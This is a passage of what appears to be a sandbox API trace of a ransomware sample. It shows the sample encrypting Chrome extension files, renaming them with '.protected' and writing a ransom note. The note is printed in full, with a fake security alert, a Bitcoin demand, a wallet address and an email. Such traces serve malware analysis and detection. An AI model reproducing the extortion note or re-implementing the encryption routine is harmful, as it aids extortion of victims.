lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.658] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.658] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\..") returned 144 [0078.659] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.659] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.659] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.659] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.659] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.659] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.659] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.659] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.659] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json") returned 155 [0078.659] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.659] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.659] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.659] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.659] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json") returned 155 [0078.659] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.659] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json") returned 155 [0078.659] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.659] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json") returned 155 [0078.659] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.659] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xdf, lpOverlapped=0x0) returned 1 [0078.660] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.660] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xdf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xdf, lpOverlapped=0x0) returned 1 [0078.660] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.660] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.660] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.660] CloseHandle (hObject=0x168) returned 1 [0078.661] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.protected") returned 165 [0078.661] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.protected")) returned 1 [0078.667] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.667] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.667] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\RESTORE_FILES.txt") returned 159 [0078.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.668] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.668] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.669] lstrlenA (lpString="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") returned 684 [0078.669] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.669] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.669] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.669] CloseHandle (hObject=0x164) returned 1 [0078.669] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.669] lstrcmpiW (lpString1="es_419", lpString2="Windows") returned -1 [0078.669] lstrcmpiW (lpString1="es_419", lpString2="Program Files") returned -1 [0078.669] lstrcmpiW (lpString1="es_419", lpString2="Program Files (x86)") returned -1 [0078.669] lstrcmpiW (lpString1="es_419", lpString2="$Recycle.bin") returned 1 [0078.669] lstrcmpiW (lpString1="es_419", lpString2="System Volume Information") returned -1 [0078.669] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419") returned 145 [0078.669] lstrcmpW (lpString1="es_419", lpString2=".") returned 1 [0078.669] lstrcmpW (lpString1="es_419", lpString2="..") returned 1 [0078.670] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\*") returned 147 [0078.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.670] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.670] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.670] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.670] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.670] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.670] wnsprintfW (in: 
pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\.") returned 147 [0078.670] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.670] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.670] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.670] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.670] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.670] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.670] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.670] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\..") returned 148 [0078.670] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.670] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.670] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.670] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.670] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.670] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.670] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.670] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.671] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json") returned 159 [0078.671] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.671] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.671] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.671] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.671] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json") returned 159 [0078.671] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.671] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json") returned 159 [0078.671] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.671] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json") returned 159 [0078.671] StrStrW 
(lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.671] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.672] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.672] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.672] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.673] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.673] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.673] CloseHandle (hObject=0x168) returned 1 [0078.673] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.protected") returned 169 [0078.673] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.protected")) returned 1 [0078.674] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.674] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.674] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\RESTORE_FILES.txt") returned 163 [0078.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.674] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.674] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.675] lstrlenA (lpString="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") returned 684 [0078.675] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0078.675] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.675] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.676] CloseHandle (hObject=0x164) returned 1 [0078.676] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.676] lstrcmpiW (lpString1="et", lpString2="Windows") returned -1 [0078.676] lstrcmpiW (lpString1="et", lpString2="Program Files") returned -1 [0078.676] lstrcmpiW (lpString1="et", lpString2="Program Files (x86)") returned -1 [0078.676] lstrcmpiW (lpString1="et", lpString2="$Recycle.bin") returned 1 [0078.676] lstrcmpiW (lpString1="et", lpString2="System Volume Information") returned -1 [0078.676] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et") returned 141 [0078.676] lstrcmpW (lpString1="et", lpString2=".") returned 1 [0078.676] lstrcmpW (lpString1="et", lpString2="..") returned 1 [0078.676] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\*") returned 143 [0078.676] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.677] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0078.677] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.677] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.677] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.677] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.677] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\.") returned 143 [0078.677] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.677] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.677] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.677] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.677] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.678] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.678] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.678] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\..") returned 144 [0078.678] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.678] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.678] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.678] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.678] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.678] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0078.678] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.678] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.678] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json") returned 155 [0078.678] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.678] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.678] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.678] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.678] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.678] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json") returned 155 [0078.678] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.678] lstrlenW 